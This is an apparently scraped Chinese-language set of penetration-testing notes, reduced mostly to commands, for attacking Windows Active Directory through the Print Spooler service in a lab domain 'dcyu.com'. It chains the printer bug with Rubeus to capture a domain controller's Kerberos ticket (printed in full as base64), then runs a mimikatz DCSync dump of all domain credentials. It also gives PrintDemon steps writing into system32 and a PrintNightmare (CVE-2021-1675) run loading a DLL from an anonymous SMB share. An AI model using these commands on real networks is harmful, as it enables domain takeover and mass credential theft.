MS-RPRNRpcRemoteFindFirstPrinterChangeNotification(Ex)
具有Kerberos无约束委派授权的账户;
能够攻陷该账户;
域控制器作为打印服务器运行(Print Spooler服务正在运行)。
域:dcyu.com;
域控:IP:10.10.10.1;
系统:Win2012;
主机名:AD;
用户:administrator;
域内主机:IP:10.10.10.10
系统:Win2012;
主机名:web01;
域用户:web01。
AdFind.exe(http://www.joeware.net/freetools/tools/adfind/)
Impacket(https://github.com/SecureAuthCorp/impacket)
SpoolSample(https://github.com/leechristensen/SpoolSample)
Rubeus(https://github.com/GhostPack/Rubeus)
AdFind.exe -b "DC=dcyu,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
AdFind.exe -b "DC=dcyu,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
ls\\ad\pipe\spoolss
python3rpcdump.py @10.10.10.1 | egrep 'MS-RPRN|MS-PAR'
Rubeus.exemonitor /interval:1 /filteruser:ad$
SpoolSample.exead web01
Rubeus.exe ptt /ticket:doIEyDCCBMSgAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQobCERDWVUuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhEQ1lVLkNPTaOCA54wggOaoAMCARKhAwIBAqKCA4wEggOIhEAzA7s8DXecjlils7N3XcCNXNH+742I3JKu20KSFPrZ3xfVuu4M9vQ7fYkc5LG/DvhZXM31lQSpZpKZb7s9Rw/Z7iaHF94eUAdU02Cr1ZNXeggpdEkEJzyaMZs0N95G+7vQwQ8HME1+Ls/NzzhshKStU9VMPJXMitGNTKSrpZLddT9ehET5v6bh7NRAQ/8G4s3WHT6v52EwG0jppRYEpgeVr22ICKq+aiZvdklqukJ1XMd0NBbbjutqH5+0EdfH5HPQpc9LTuyiBCcENZ3ZBKHp1EecXFxDaXThWVVtN52KdZ3s1FflawxxY3tiv04JqUoGwU4Dw6NUBQjaHnjQbtY4A6Ua7SRmdNtIpN5InxXKe/aK0said1DAJz8gez4oj5FeZzsDqp3o6TE5oCuNYMpHxMnwreD58/eiTNJR/5yQkoTDArt2c9ACdwUhGOH+hfDEpFGTS0cy+N1OrAdY7BSM0uEfxRyFtMnWcbO3eGlQR6H2EAMiqns0+sc8Pr/JgQCAA0zTxblrNQwbnhNRkna9m972bRgDJM36HQN4RGLErWcRexVkXVSe4VTCMW2DoDjq2VGvfHuszex+y0zRbRbI+jGYfwOqgcqshV4QhtZxxqmH9c5tqZH/AjoF6Kq8HZIjq7FzujPuu4daQl5v2EDLiGNG4/SwJyMaBbTiDY7JF+JAm/MydueDxV6q3iRfUlyXIAs1WPfe56huQc/ZaTJZP3Od1mhsBb1vx8cx+2FBmEnnDMmXOKLM6i44TJ12Hejz6zsJNnkCvwsSCIPI6xmB+lcRqpV6UFSNOSKf/wQap/TrZG+6peFBFFcJGMm3fA8U5xnIagZ6wuZUxsB+M/Mxm5E6u3fOVXWiFOodo/UNlO+VBNnBXRXsmu48T66Fndecpa/R7Kp1AvZhicErzY/q527YWu7AxlOoQichYcTELwJ9SOn0gpx9Rv7JhHY/ka9usGFnXukI9YYS1hY/vyUlNMZrvzhtDdALVSHc87md3wqOIWTwXVR5O4o6xgeKNmNbQBu8JeEYbt3LOGrKRMIJWCSSFHTNnlmeIrWTTOeanbZpuAnzcuyMyI1W8/s2PlycqmRh0POMmy1/ITOJHQmHgQYeaMpDhuCnUvvIGWs+LeBhdoLyyXHdnYokQ6Gc285lnJ9xJy2vv2nc9rvjHHVlUC0WnnlZlFuGiQCyBf8D6JCS1YmvOKOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oCswKaADAgESoSIEICdPOOt8xHFIpO+5u1BCUv2tjnemIILIHn8UJnZH9g0AoQobCERDWVUuQ09NohAwDqADAgEBoQcwBRsDQUQkowcDBQBgoQAApREYDzIwMjExMjI2MTMyNTI5WqYRGA8yMDIxMTIyNjIzMjUyOVqnERgPMjAyMjAxMDIxMzI1MjlaqAobCERDWVUuQ09NqR0wG6ADAgECoRQwEhsGa3JidGd0GwhEQ1lVLkNPTQ==
klist
lsadump::dcsync/domain:dcyu.com /all /csv
Microsoft Windows 10,Windows 10 1607版本,Windows 10 1709版本,Windows 10 1803版本,Windows 10 1809版本,Windows 10 1903版本,Windows 10 1909版本,Windows 7 SP1,Windows 8.1,Windows RT 8.1,Windows Server 2008 SP2,Windows Server 2008 R2 SP1,Windows Server 2012,Windows Server 2012 R2,Windows Server 2016,Windows Server 2019,Windows Server 1803版本,Windows Server 1903版本,Windows Server 1909版本。
netuser PrintDemon [email protected]12345 /add
Add-PrinterDriver -Name "Generic / Text Only"
Get-PrinterDriver
Add-PrinterPort -Name "C:\Windows\system32\PrintDemon.txt"
Get-PrinterPort | ft name
Add-Printer -Name "PrintDemon" -DriverName "Generic /Text Only" -PortName "C:\Windows\system32\PrintDemon.txt"
Get-Printer | ft Name,DriverName,PortName
"Hello, World!" | Out-Printer -Name "PrintDemon"
type C:\Windows\system32\PrintDemon.txt
Add-PrinterPort-Namec:\windows\system32\ualapi.dll
利用CVE-2020-1337;
利用CVE-2020-17001。
目标开启Spooler服务;
一个普通权限的域账户;
创建的smb服务允许匿名访问,即目标可以直接获取到文件。
域:dcyu.com;
域控:IP:192.168.194.131;
系统:Win2019;
主机名:AD;
用户:administrator;
域内主机:IP:192.168.194.135;
系统:Win2019;
主机名:web01;
域用户:web01
攻击主机:IP:192.168.194.130;
系统:Kali。
ls\\AD\pipe\spoolss
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
rpcdump.py @192.168.194.131 | egrep 'MS-RPRN|MS-PAR'
./CVE-2021-1675.py dcyu.com/[email protected]168.194.131 '\\192.168.194.135\share\b64.dll'